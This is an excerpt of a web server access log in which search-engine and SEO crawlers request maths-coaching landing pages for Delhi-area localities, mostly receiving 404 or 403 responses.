157.55.39.60 - - [02/Aug/2021:17:35:33 +0000] "GET /best-iit-jee-maths-coaching-in-akshar-dham-new-delhi HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.8 - - [02/Aug/2021:17:37:26 +0000] "GET /best-ib-maths-coaching-in-bahapur-new-delhi HTTP/1.1" 404 241 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.124 - - [02/Aug/2021:17:41:08 +0000] "GET /11th-class-maths-online-coaching-in-sarita-vihar-new-delhi HTTP/1.1" 404 256 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
72.14.199.45 - - [02/Aug/2021:17:41:43 +0000] "GET / HTTP/1.1" 403 209 "-" "AdsBot-Google (+http://www.google.com/adsbot.html)"
66.249.79.171 - - [02/Aug/2021:17:43:42 +0000] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
118.24.106.70 - - [02/Aug/2021:17:51:29 +0000] "GET / HTTP/1.1" 403 209 "-" "Mozilla/5.0 (compatible; ThinkBot/0.3.0; +In_the_test_phase,_if_the_spider_brings_you_trouble,_please_add_our_IP_to_the_blacklist._Thank_you.)"
54.36.148.215 - - [02/Aug/2021:18:15:26 +0000] "GET /11th-class-maths-online-coaching-in-moti-bagh-new-delhi HTTP/1.1" 404 253 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
207.46.13.29 - - [02/Aug/2021:19:34:14 +0000] "GET /best-ib-maths-coaching-in-sector-133-noida/ HTTP/1.1" 404 241 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.60 - - [02/Aug/2021:20:02:37 +0000] "GET /best-iit-jee-maths-coaching-in-akshar-dham-new-delhi HTTP/1.1" 404 250 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.104 - - [02/Aug/2021:20:07:40 +0000] "GET /12th-class-maths-online-coaching-in-sector-20a-faridabad HTTP/1.1" 404 254 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
54.36.148.79 - - [02/Aug/2021:20:11:05 +0000] "GET /11th-class-maths-online-coaching-in-qutub-vihar-new-delhi HTTP/1.1" 404 255 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
